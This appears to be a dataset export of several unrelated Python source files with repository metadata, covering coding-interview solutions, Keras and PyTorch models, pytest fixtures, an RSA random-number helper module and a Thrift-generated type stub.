7da477883e2730f6f5c070b0800fb4dc3f8c6687 | c3a76533d1fbb53f291f49fb95b5e89ed69a75f5 | /amazon_mianjing/isomorphicString.py | 19372b8e2e48d6bd81616dac258d4ef20febecc3 | [] | no_license | jing1988a/python_fb | 5feb68efd32bd63952b4df0c0cd2e766b83451ea | fd310ec0a989e003242f1840230aaac150f006f0 | refs/heads/master | 2020-03-28T21:03:19.375549 | 2019-01-31T17:02:17 | 2019-01-31T17:02:17 | 149,125,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 951 | py | # 给你一个list word 你把所有isomorphic group的word分到一起
# isomorphic string的意思是string a 到string b 里面有每一个char都是one to one relationship
# 比如 aba 和cmc是isomorphic 但是aba 和ccc 就不是
# eg: {abba, cppc, abc, emf, bbbb, m} => {{abba, cppc}, {abc, emf}, {bbbb}, {m}}
import collections
class Problem:
def solve(self , words):
# assume no duplicate in words? not case censitive??
d=collections.defaultdict(list)
for w in set(words):
d[self.getPattern(w)].append(w)
return d.values()
def getPattern(self , w):
words=list('qwertyuiopasdfghjklzxcvbnm')
ctoP=dict()
pattern=[]
for c in w:
if c not in ctoP:
p=words.pop()
ctoP[c]=p
pattern.append(ctoP[c])
return ''.join(pattern)
test=Problem()
print(test.solve(['abba', 'cppc', 'abc', 'emf', 'bbbb', 'm']))
| [
"[email protected]"
] | |
7d85cf8e793d99257d0ce79b6ec1c76a761f0006 | a37b756e34fc39c1237fc68997dbef77df9fa6fc | /dacon/1_articles/dacon_classify_articles_1.py | e5e5f197a6da6982360718465da885fd45e7c8be | [] | no_license | jvd2n/ai-study | e20e38493ad295940a3201fc0cc8061ca9052607 | a82f7c6d89db532f881c76b553b5ab3eea0bdd59 | refs/heads/main | 2023-08-06T03:24:39.182686 | 2021-10-06T14:41:01 | 2021-10-06T14:41:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,836 | py | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
from icecream import ic
# Data
PATH = './dacon/news/'
train = pd.read_csv(PATH + 'train_data.csv')
test = pd.read_csv(PATH + 'test_data.csv')
submission = pd.read_csv(PATH + 'sample_submission.csv')
ic(train, test, submission)
ic(train.shape, test.shape) # (45654, 3) (9131, 2)
train['doc_len'] = train.title.apply(lambda words: len(words.split()))
ic(train['doc_len'].max())
x_train = np.array([x for x in train['title']])
x_test = np.array([x for x in test['title']])
y_train = np.array([x for x in train['topic_idx']])
ic(x_train, x_test, y_train)
ic(x_train.shape, x_test.shape, y_train.shape) # (45654,) (9131,) (45654,)
print("Article's Max Length: ", max(len(i) for i in x_train)) # 44
print("Article's Avg Length: ", sum(map(len, x_train)) / len(x_train)) # 27.33
# plt.hist([len(s) for s in x_train], bins=50)
# plt.show()
# Preprocessing
from tensorflow.keras.preprocessing.text import Tokenizer
# token = Tokenizer(num_words=2000)
token = Tokenizer(num_words=2000)
token.fit_on_texts(x_train)
seq_train = token.texts_to_sequences(x_train)
seq_test = token.texts_to_sequences(x_test)
print(len(seq_train), len(seq_test))
ic(seq_train[:10])
ic(np.unique(seq_train))
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.utils import to_categorical
x_train = pad_sequences(seq_train, padding='pre', maxlen=14)
x_test = pad_sequences(seq_test, padding='pre', maxlen=14)
ic(x_train.shape, x_test.shape) # (45654, 14) (9131, 14)
y_train = to_categorical(y_train)
ic(y_train)
ic(y_train.shape) # (45654, 7)
# Modeling
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, LSTM, Embedding, Bidirectional
from tensorflow.keras.callbacks import EarlyStopping
model = Sequential()
model.add(Embedding(2000, 200, input_length=14))
model.add(Bidirectional(LSTM(units=128, return_sequences=True)))
model.add(Bidirectional(LSTM(units=64, return_sequences=True)))
model.add(Bidirectional(LSTM(units=32)))
model.add(Dense(7, activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])
model.summary()
es = EarlyStopping(monitor='val_loss', mode='min', verbose=1, patience=5)
model.fit(x_train, y_train, epochs=50, batch_size=32, validation_split=0.2, callbacks=[es])
y_predict = model.predict(x_test)
ic(y_predict)
# Results make to_csv submissions
ic(len(y_predict))
topic = []
for i in range(len(y_predict)):
topic.append(np.argmax(y_predict[i])) # np.argmax -> 최대값의 색인 위치
submission['topic_idx'] = topic
ic(submission.shape)
import datetime
date_time = datetime.datetime.now().strftime("%y%m%d_%H%M")
submission.to_csv(PATH + 'CLSFY_ATC_SUB_1_' + date_time + '.csv', index=False) | [
"[email protected]"
] | |
049a63b08359ef20611b5bbed9f50e22220ea117 | bbc8192636e0f254ffcb0537306a5bf387235aec | /p2/src/test/test_fixtest.py | 3286780d878dbc2564ccf50eff4d1557ca0526ce | [] | no_license | datason/deployml_course | 99c0034affb66277fef53aca1f903ae93ad3fc12 | f2817115063bae714b02b16bf2ed64f38f0b99ea | refs/heads/main | 2023-02-06T10:59:57.500638 | 2020-12-30T09:27:04 | 2020-12-30T09:27:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,133 | py | # up to parent
import sys, os
PACKAGE_PARENT = '../..'
SCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))
CURROOT = os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT))
sys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))
import numpy as np
import pandas as pd
import joblib
from src.main.preprocessors import *
from config.config import *
import pytest
# fixture - создает специальный объект для работы в тестах
@pytest.fixture
def params():
N_ESTIMATORS = 32
MAX_DEPTH = 12
MIN_SAMPLES_LEAF = 3
CRITERION = 'mse'
return({"n_estimators" : N_ESTIMATORS,
"max_depth" : MAX_DEPTH,
"min_samples_leaf" : MIN_SAMPLES_LEAF,
"criterion" : CRITERION,
"random_state" : SEED})
@pytest.fixture
def simulated_data():
# можно зафиксировать ожидаемый результат, а не вводные данные
# пример: сохраненный результат predict
dp = r'%s' % os.path.abspath(os.path.join(os.path.dirname("src"), os.pardir, os.pardir, 'data')).replace('\\', '/')
return generate_test_df(DATA_PATH, CLEAN_DATA, 5)
def test_fit(simulated_data, params):
rfm = RFModel(**params)
data_train = simulated_data
data_test1 = simulated_data
#data_test2 = simulated_data
rfm.fit(data_train[MODEL_FEATURES], data_train[TARGET_NAME])
# или использовать pandas.testing.assert_frame_equal
assert np.allclose(rfm.predict(data_test1[MODEL_FEATURES]), rfm.predict(data_test1[MODEL_FEATURES]), rtol= 0.1)
#assert np.allclose(rfm.predict(data_test2[MODEL_FEATURES]), data_test2[TARGET_NAME], rtol= 0.1)
def test_checkfail(simulated_data, params):
rfm = RFModel(**params)
data_train = simulated_data
# Did not raise
#with pytest.raises(ValueError):
# rfm.fit(data_train[MODEL_FEATURES], data_train[TARGET_NAME])
with pytest.raises(TypeError):
rfm.fit(data_train[MODEL_FEATURES], ",".join(data_train[TARGET_NAME])) | [
"[email protected]"
] | |
95cfc91c55e0f76e5468b436c73920eda466e577 | ab7d6793c9b00b00eae63533bbeffa45a710f690 | /models/HCN.py | 7fed678e3d62e686d23a10570581cab5a6e55ec1 | [] | no_license | subburajs/SLR-1 | c327090256b267b1877854ee01172fc956946876 | 2fc724303dd530ff46085ae89471f958470e3e14 | refs/heads/master | 2023-03-19T21:56:14.061002 | 2020-06-21T16:09:07 | 2020-06-21T16:09:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,307 | py | import torch
import torch.nn as nn
import torchvision
from torchvision import models
from torch.nn import functional as F
class hcn(nn.Module):
def __init__(self,num_class, in_channel=2,
length=32,
num_joint=10,
dropout=0.2):
super(hcn, self).__init__()
self.num_class = num_class
self.in_channel = in_channel
self.length = length
self.num_joint = num_joint
self.conv1 = nn.Sequential(
nn.Conv2d(in_channel,64,1,1,padding=0),
nn.ReLU()
)
# self.bn1 = nn.BatchNorm2d(64)
self.conv2 = nn.Conv2d(64,32,(3,1),1,padding=(1,0))
# self.bn2 = nn.BatchNorm2d(32)
self.hconv = HierarchyConv()
self.conv4 = nn.Sequential(
nn.Conv2d(32,64,3,1,padding=1),
nn.Dropout2d(p=dropout),
nn.MaxPool2d(2)
)
# self.bn4 = nn.BatchNorm2d(64)
self.convm1 = nn.Sequential(
nn.Conv2d(in_channel,64,1,1,padding=0),
nn.ReLU()
)
# self.bnm1 = nn.BatchNorm2d(64)
self.convm2 = nn.Conv2d(64,32,(3,1),1,padding=(1,0))
# self.bnm2 = nn.BatchNorm2d(32)
self.hconvm = HierarchyConv()
self.convm4 = nn.Sequential(
nn.Conv2d(32,64,3,1,padding=1),
nn.Dropout2d(p=dropout),
nn.MaxPool2d(2)
)
# self.bnm4 = nn.BatchNorm2d(64)
self.conv5 = nn.Sequential(
nn.Conv2d(128,128,3,1,padding=1),
nn.ReLU(),
nn.Dropout2d(p=dropout),
nn.MaxPool2d(2)
)
# self.bn5 = nn.BatchNorm2d(128)
self.conv6 = nn.Sequential(
nn.Conv2d(128,256,3,1,padding=1),
nn.ReLU(),
nn.Dropout2d(p=dropout),
nn.MaxPool2d(2)
)
# self.bn6 = nn.BatchNorm2d(256)
# scale related to total number of maxpool layer
scale = 16
self.fc7 = nn.Sequential(
nn.Linear(256*(length//scale)*(32//scale),256),
nn.ReLU(),
nn.Dropout2d(p=dropout)
)
self.fc8 = nn.Linear(256,self.num_class)
def forward(self,input):
output = self.get_feature(input)
output = self.classify(output)
return output
def get_feature(self,input):
# input: N T J D
input = input.permute(0,3,1,2)
N, D, T, J = input.size()
motion = input[:,:,1::,:]-input[:,:,0:-1,:]
motion = F.upsample(motion,size=(T,J),mode='bilinear').contiguous()
out = self.conv1(input)
# out = self.bn1(out)
out = self.conv2(out)
# out = self.bn2(out)
out = out.permute(0,3,2,1).contiguous()
# out: N J T D
# out = self.conv3(out)
out = self.hconv(out)
out = self.conv4(out)
# out = self.bn4(out)
outm = self.convm1(motion)
# outm = self.bnm1(outm)
outm = self.convm2(outm)
# outm = self.bnm2(outm)
outm = outm.permute(0,3,2,1).contiguous()
# outm: N J T D
# outm = self.convm3(outm)
outm = self.hconvm(outm)
outm = self.convm4(outm)
# outm = self.bnm4(outm)
out = torch.cat((out,outm),dim=1)
out = self.conv5(out)
# out = self.bn5(out)
out = self.conv6(out)
# out = self.bn6(out)
# out: N J T(T/16) D
return out
def classify(self,input):
out = input.view(input.size(0),-1)
out = self.fc7(out)
out = self.fc8(out)
t = out
assert not ((t != t).any())# find out nan in tensor
assert not (t.abs().sum() == 0) # find out 0 tensor
# N x C (num_class)
return out
class HierarchyConv(nn.Module):
def __init__(self):
super(HierarchyConv,self).__init__()
self.convla = nn.Conv2d(2,16,3,1,padding=1)
self.convra = nn.Conv2d(2,16,3,1,padding=1)
self.conflh = nn.Conv2d(21,16,3,1,padding=1)
self.confrh = nn.Conv2d(21,16,3,1,padding=1)
self.convf = nn.Conv2d(70,32,3,1,padding=1)
self.convl = nn.Conv2d(32,32,3,1,padding=1)
self.convr = nn.Conv2d(32,32,3,1,padding=1)
self.parts = 3
self.conv = nn.Sequential(
nn.Conv2d(self.parts*32,32,3,1,padding=1),
nn.MaxPool2d(2)
)
# self.bn = nn.BatchNorm2d(32)
def forward(self,input):
left_arm = input[:,[3,4],:,:]
right_arm = input[:,[6,7],:,:]
face = input[:,25:95,:,:]
left_hand = input[:,95:116,:,:]
right_hand = input[:,116:137,:,:]
# left_arm = input[:,[0,1],:,:]
# right_arm = input[:,[2,3],:,:]
# face = input[:,4:74,:,:]
# left_hand = input[:,74:95,:,:]
# right_hand = input[:,95:116,:,:]
l1 = self.convla(left_arm)
r1 = self.convra(right_arm)
l2 = self.conflh(left_hand)
r2 = self.confrh(right_hand)
l = torch.cat([l1,l2],1)
r = torch.cat([r1,r2],1)
l = self.convl(l)
r = self.convr(r)
f = self.convf(face)
out = torch.cat([l,r,f],1)
out = self.conv(out)
# out = self.bn(out)
return out | [
"[email protected]"
] | |
54b2f75b9c95fad2376fd7e521729582e3913dbc | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03729/s693243287.py | 3d79cef6c484c819706127a9b7d9fd8131e45a28 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 125 | py | A = list(map(str,input().rstrip().split(" ")))
if(A[0][-1] == A[1][0] and A[1][-1] == A[2][0]):print("YES")
else: print("NO") | [
"[email protected]"
] | |
9fbb8d857ef7cc14b89be917d6cb223e5b2d5dc8 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /5FoNY2Z7B5wSCDTA4_0.py | fc139177107dd49dad4a420b77ec06ab6021e1c7 | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 484 | py | """
**Mubashir** needs your help to find out next happy year.
A **Happy Year** is the year with only _distinct digits_. Create a function
that takes an integer `year` and returns the **next happy year**.
### Examples
happy_year(2017) ➞ 2018
# 2018 has all distinct digits
happy_year(1990) ➞ 2013
happy_year(2021) ➞ 2031
### Notes
N/A
"""
def happy_year(year):
year += 1
while len(set(str(year))) != 4:year += 1
return year
| [
"[email protected]"
] | |
f19b981590955f36e941e7afe7fc8e93e62b4691 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/6/o-6.py | 1716de51f5f78c365bfd3307c53c770d5dfa8d65 | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'o-6':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
] | |
6bfec8c1fcbb786162593abf6d669f571b7c851e | 275a96a33ae1f89e7b2ee0ecdbac7d78abe6d6cc | /test/test_user_with_balance_result.py | 72c8b77ba889ac3b0da96b18a24fc46de2b8a7de | [] | no_license | cascadiarc/cyclos-python-client | 8029ce07174f2fe92350a92dda9a60976b2bb6c2 | a2e22a30e22944587293d51be2b8268bce808d70 | refs/heads/main | 2023-04-03T16:52:01.618444 | 2021-04-04T00:00:52 | 2021-04-04T00:00:52 | 354,419,532 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 929 | py | # coding: utf-8
"""
Cyclos 4.11.5 API
The REST API for Cyclos 4.11.5 # noqa: E501
OpenAPI spec version: 4.11.5
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.user_with_balance_result import UserWithBalanceResult # noqa: E501
from swagger_client.rest import ApiException
class TestUserWithBalanceResult(unittest.TestCase):
"""UserWithBalanceResult unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testUserWithBalanceResult(self):
"""Test UserWithBalanceResult"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.user_with_balance_result.UserWithBalanceResult() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
6ac2e4e4004008a5b2623b6c78287deb51703b8f | bbeba16730eca05a897e46e771b8e9dc2a61e044 | /testflows/_core/contrib/rsa/randnum.py | aad03fac065e68575ca88525fb786438bdd31ccc | [
"Apache-2.0"
] | permissive | testflows/TestFlows-Core | 47d3e5b8890fcf73024c91f4ea293363c29f422b | 7dd2d3af19f6930257bd53133286edb78bf490ab | refs/heads/master | 2023-08-16T15:42:08.888323 | 2023-08-15T11:35:09 | 2023-08-15T11:35:09 | 215,418,320 | 5 | 4 | NOASSERTION | 2023-04-26T19:28:55 | 2019-10-15T23:59:26 | Python | UTF-8 | Python | false | false | 2,695 | py | # Copyright 2011 Sybren A. Stüvel <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Functions for generating random numbers."""
# Source inspired by code by Yesudeep Mangalapilly <[email protected]>
import os
import struct
from .common import bit_size as get_bit_size
from .transform import bytes2int
def read_random_bits(nbits: int) -> bytes:
"""Reads 'nbits' random bits.
If nbits isn't a whole number of bytes, an extra byte will be appended with
only the lower bits set.
"""
nbytes, rbits = divmod(nbits, 8)
# Get the random bytes
randomdata = os.urandom(nbytes)
# Add the remaining random bits
if rbits > 0:
randomvalue = ord(os.urandom(1))
randomvalue >>= (8 - rbits)
randomdata = struct.pack("B", randomvalue) + randomdata
return randomdata
def read_random_int(nbits: int) -> int:
"""Reads a random integer of approximately nbits bits.
"""
randomdata = read_random_bits(nbits)
value = bytes2int(randomdata)
# Ensure that the number is large enough to just fill out the required
# number of bits.
value |= 1 << (nbits - 1)
return value
def read_random_odd_int(nbits: int) -> int:
"""Reads a random odd integer of approximately nbits bits.
>>> read_random_odd_int(512) & 1
1
"""
value = read_random_int(nbits)
# Make sure it's odd
return value | 1
def randint(maxvalue: int) -> int:
"""Returns a random integer x with 1 <= x <= maxvalue
May take a very long time in specific situations. If maxvalue needs N bits
to store, the closer maxvalue is to (2 ** N) - 1, the faster this function
is.
"""
bit_size = get_bit_size(maxvalue)
tries = 0
while True:
value = read_random_int(bit_size)
if value <= maxvalue:
break
if tries % 10 == 0 and tries:
# After a lot of tries to get the right number of bits but still
# smaller than maxvalue, decrease the number of bits by 1. That'll
# dramatically increase the chances to get a large enough number.
bit_size -= 1
tries += 1
return value
| [
"[email protected]"
] | |
32efb664104158f736b734dd02cffd81d7c62d5f | 8cfdba6dd2804e2c3e3faed0c47640f347b14414 | /utils/util.py | 4bca3bba741b252dee48d19f96f64b8b9842e9ac | [] | no_license | DiegoDigo/tochegando | 07c4368842897d80df57545a93bf182203724b04 | 36ac3b7109a60a4998b283c54d85d80b8c8e535e | refs/heads/master | 2023-05-28T08:49:43.564907 | 2017-11-27T19:28:06 | 2017-11-27T19:28:06 | 108,421,683 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | py | from datetime import datetime
def verificar_idade(datanasc:datetime):
if datanasc.month == datetime.today().month:
return datetime.today().year - datanasc.year
else:
return (datetime.today().year - datanasc.year) - 1 | [
"[email protected]"
] | |
e0532dcd7c140dfcde74fa62db1322d31eff3488 | 2f1a092537d8650cacbd274a3bd600e87a627e90 | /thrift/compiler/test/fixtures/pyi/gen-py/simple/example_asyncio/ttypes.pyi | d1f0a742d882edc21258502a70bc4aa3634383af | [
"Apache-2.0"
] | permissive | ConnectionMaster/fbthrift | 3aa7d095c00b04030fddbabffbf09a5adca29d42 | d5d0fa3f72ee0eb4c7b955e9e04a25052678d740 | refs/heads/master | 2023-04-10T17:49:05.409858 | 2021-08-03T02:32:49 | 2021-08-03T02:33:57 | 187,603,239 | 1 | 1 | Apache-2.0 | 2023-04-03T23:15:28 | 2019-05-20T08:49:29 | C++ | UTF-8 | Python | false | false | 10,443 | pyi | #
# Autogenerated by Thrift
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
# @generated
#
# pyre-unsafe
import typing as __T # sometimes `t` is used as a field name
from thrift import Thrift
from thrift.protocol.TProtocol import TProtocolBase
__property__ = property # sometimes `property` is used as a field name
import simple.dependent_asyncio.ttypes
UTF8STRINGS: bool
class AnEnum(int):
ONE: __T.ClassVar[AnEnum]
TWO: __T.ClassVar[AnEnum]
THREE: __T.ClassVar[AnEnum]
FOUR: __T.ClassVar[AnEnum]
_VALUES_TO_NAMES: __T.ClassVar[__T.Dict[AnEnum, str]]
_NAMES_TO_VALUES: __T.ClassVar[__T.Dict[str, AnEnum]]
class SimpleException(Thrift.TException):
thrift_spec: __T.Tuple[__T.Optional[__T.Tuple[int, int, str, __T.Any, __T.Optional[int], int]]]
thrift_field_annotations: __T.Dict[int, __T.Dict[str, str]]
thrift_struct_annotations: __T.Dict[str, str]
def __init__(
self,
err_code: __T.Optional[int] = ...
) -> None:
...
@__property__
def err_code(self) -> int: ...
@err_code.setter
def err_code(self, value: __T.Optional[int]) -> None: ...
def isUnion(self) -> bool: ...
def checkRequired(self) -> None: ...
def read(self, iprot: TProtocolBase) -> None: ...
@__T.overload
def readFromJson(self, json: __T.Dict[str, __T.Any], is_text: bool = ..., **kwargs: __T.Any) -> None: ...
@__T.overload
def readFromJson(self, json: str, is_text: bool = ..., **kwargs: __T.Any) -> None: ...
def write(self, oprot: TProtocolBase) -> None: ...
def __eq__(self, other: __T.Any) -> bool: ...
def __ne__(self, other: __T.Any) -> bool: ...
class MessageException(Thrift.TException):
thrift_spec: __T.Tuple[__T.Optional[__T.Tuple[int, int, str, __T.Any, __T.Optional[int], int]]]
thrift_field_annotations: __T.Dict[int, __T.Dict[str, str]]
thrift_struct_annotations: __T.Dict[str, str]
def __init__(
self,
message: __T.Optional[str] = ...,
err_code: __T.Optional[int] = ...
) -> None:
...
@__property__
def message(self) -> str: ...
@message.setter
def message(self, value: __T.Optional[str]) -> None: ...
@__property__
def err_code(self) -> int: ...
@err_code.setter
def err_code(self, value: __T.Optional[int]) -> None: ...
def isUnion(self) -> bool: ...
def checkRequired(self) -> None: ...
def read(self, iprot: TProtocolBase) -> None: ...
@__T.overload
def readFromJson(self, json: __T.Dict[str, __T.Any], is_text: bool = ..., **kwargs: __T.Any) -> None: ...
@__T.overload
def readFromJson(self, json: str, is_text: bool = ..., **kwargs: __T.Any) -> None: ...
def write(self, oprot: TProtocolBase) -> None: ...
def __eq__(self, other: __T.Any) -> bool: ...
def __ne__(self, other: __T.Any) -> bool: ...
class SimpleStruct:
thrift_spec: __T.Tuple[__T.Optional[__T.Tuple[int, int, str, __T.Any, __T.Optional[int], int]]]
thrift_field_annotations: __T.Dict[int, __T.Dict[str, str]]
thrift_struct_annotations: __T.Dict[str, str]
def __init__(
self,
is_on: __T.Optional[bool] = ...,
tiny_int: int = ...,
small_int: __T.Optional[int] = ...,
nice_sized_int: __T.Optional[int] = ...,
big_int: __T.Optional[int] = ...,
coarse_real: float = ...,
precise_real: __T.Optional[float] = ...,
a_str: __T.Optional[str] = ...,
a_bytes: __T.Optional[bytes] = ...
) -> None:
...
@__property__
def is_on(self) -> bool: ...
@is_on.setter
def is_on(self, value: __T.Optional[bool]) -> None: ...
@__property__
def tiny_int(self) -> int: ...
@tiny_int.setter
def tiny_int(self, value: int) -> None: ...
@__property__
def small_int(self) -> __T.Optional[int]: ...
@small_int.setter
def small_int(self, value: __T.Optional[int]) -> None: ...
@__property__
def nice_sized_int(self) -> __T.Optional[int]: ...
@nice_sized_int.setter
def nice_sized_int(self, value: __T.Optional[int]) -> None: ...
@__property__
def big_int(self) -> int: ...
@big_int.setter
def big_int(self, value: __T.Optional[int]) -> None: ...
@__property__
def coarse_real(self) -> float: ...
@coarse_real.setter
def coarse_real(self, value: float) -> None: ...
@__property__
def precise_real(self) -> float: ...
@precise_real.setter
def precise_real(self, value: __T.Optional[float]) -> None: ...
@__property__
def a_str(self) -> str: ...
@a_str.setter
def a_str(self, value: __T.Optional[str]) -> None: ...
@__property__
def a_bytes(self) -> __T.Optional[bytes]: ...
@a_bytes.setter
def a_bytes(self, value: __T.Optional[bytes]) -> None: ...
def isUnion(self) -> bool: ...
def checkRequired(self) -> None: ...
def read(self, iprot: TProtocolBase) -> None: ...
@__T.overload
def readFromJson(self, json: __T.Dict[str, __T.Any], is_text: bool = ..., **kwargs: __T.Any) -> None: ...
@__T.overload
def readFromJson(self, json: str, is_text: bool = ..., **kwargs: __T.Any) -> None: ...
def write(self, oprot: TProtocolBase) -> None: ...
def __eq__(self, other: __T.Any) -> bool: ...
def __ne__(self, other: __T.Any) -> bool: ...
class ComplexStruct:
thrift_spec: __T.Tuple[__T.Optional[__T.Tuple[int, int, str, __T.Any, __T.Optional[int], int]]]
thrift_field_annotations: __T.Dict[int, __T.Dict[str, str]]
thrift_struct_annotations: __T.Dict[str, str]
def __init__(
self,
structOne: __T.Optional[SimpleStruct] = ...,
structTwo: __T.Optional[SimpleStruct] = ...,
an_integer: __T.Optional[int] = ...,
name: __T.Optional[str] = ...,
an_enum: __T.Optional[AnEnum] = ...,
values: __T.Optional[__T.List[int]] = ...,
structs: __T.Optional[__T.List[SimpleStruct]] = ...,
amap: __T.Optional[__T.Dict[str, str]] = ...,
aset: __T.Optional[__T.Set[str]] = ...,
item: __T.Optional[simple.dependent_asyncio.ttypes.Item] = ...,
from_PY_RESERVED_KEYWORD: __T.Optional[int] = ...
) -> None:
...
@__property__
def structOne(self) -> SimpleStruct: ...
@structOne.setter
def structOne(self, value: __T.Optional[SimpleStruct]) -> None: ...
@__property__
def structTwo(self) -> __T.Optional[SimpleStruct]: ...
@structTwo.setter
def structTwo(self, value: __T.Optional[SimpleStruct]) -> None: ...
@__property__
def an_integer(self) -> int: ...
@an_integer.setter
def an_integer(self, value: __T.Optional[int]) -> None: ...
@__property__
def name(self) -> str: ...
@name.setter
def name(self, value: __T.Optional[str]) -> None: ...
@__property__
def an_enum(self) -> AnEnum: ...
@an_enum.setter
def an_enum(self, value: __T.Optional[AnEnum]) -> None: ...
@__property__
def values(self) -> __T.List[int]: ...
@values.setter
def values(self, value: __T.Optional[__T.List[int]]) -> None: ...
@__property__
def structs(self) -> __T.List[SimpleStruct]: ...
@structs.setter
def structs(self, value: __T.Optional[__T.List[SimpleStruct]]) -> None: ...
@__property__
def amap(self) -> __T.Dict[str, str]: ...
@amap.setter
def amap(self, value: __T.Optional[__T.Dict[str, str]]) -> None: ...
@__property__
def aset(self) -> __T.Set[str]: ...
@aset.setter
def aset(self, value: __T.Optional[__T.Set[str]]) -> None: ...
@__property__
def item(self) -> simple.dependent_asyncio.ttypes.Item: ...
@item.setter
def item(self, value: __T.Optional[simple.dependent_asyncio.ttypes.Item]) -> None: ...
@__property__
def from_PY_RESERVED_KEYWORD(self) -> int: ...
@from_PY_RESERVED_KEYWORD.setter
def from_PY_RESERVED_KEYWORD(self, value: __T.Optional[int]) -> None: ...
def isUnion(self) -> bool: ...
def checkRequired(self) -> None: ...
def read(self, iprot: TProtocolBase) -> None: ...
@__T.overload
def readFromJson(self, json: __T.Dict[str, __T.Any], is_text: bool = ..., **kwargs: __T.Any) -> None: ...
@__T.overload
def readFromJson(self, json: str, is_text: bool = ..., **kwargs: __T.Any) -> None: ...
def write(self, oprot: TProtocolBase) -> None: ...
def __eq__(self, other: __T.Any) -> bool: ...
def __ne__(self, other: __T.Any) -> bool: ...
class UnionStruct:
thrift_spec: __T.Tuple[__T.Optional[__T.Tuple[int, int, str, __T.Any, __T.Optional[int], int]]]
thrift_field_annotations: __T.Dict[int, __T.Dict[str, str]]
thrift_struct_annotations: __T.Dict[str, str]
def __init__(
self,
is_a_bool: __T.Optional[bool] = ...,
some_string_goes_here: __T.Optional[str] = ...,
perhaps_a_big_int: __T.Optional[int] = ...
) -> None:
...
@__property__
def is_a_bool(self) -> bool: ...
@is_a_bool.setter
def is_a_bool(self, value: __T.Optional[bool]) -> None: ...
@__property__
def some_string_goes_here(self) -> str: ...
@some_string_goes_here.setter
def some_string_goes_here(self, value: __T.Optional[str]) -> None: ...
@__property__
def perhaps_a_big_int(self) -> int: ...
@perhaps_a_big_int.setter
def perhaps_a_big_int(self, value: __T.Optional[int]) -> None: ...
def getType(self) -> int: ...
def get_is_a_bool(self) -> bool: ...
def set_is_a_bool(self, value: bool) -> None: ...
def get_some_string_goes_here(self) -> str: ...
def set_some_string_goes_here(self, value: str) -> None: ...
def get_perhaps_a_big_int(self) -> int: ...
def set_perhaps_a_big_int(self, value: int) -> None: ...
__EMPTY__: int = ...
IS_A_BOOL: int = ...
SOME_STRING_GOES_HERE: int = ...
PERHAPS_A_BIG_INT: int = ...
def isUnion(self) -> bool: ...
def checkRequired(self) -> None: ...
def read(self, iprot: TProtocolBase) -> None: ...
@__T.overload
def readFromJson(self, json: __T.Dict[str, __T.Any], is_text: bool = ..., **kwargs: __T.Any) -> None: ...
@__T.overload
def readFromJson(self, json: str, is_text: bool = ..., **kwargs: __T.Any) -> None: ...
def write(self, oprot: TProtocolBase) -> None: ...
def __eq__(self, other: __T.Any) -> bool: ...
def __ne__(self, other: __T.Any) -> bool: ...
ListOfSimpleStructs = __T.List[SimpleStruct]
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.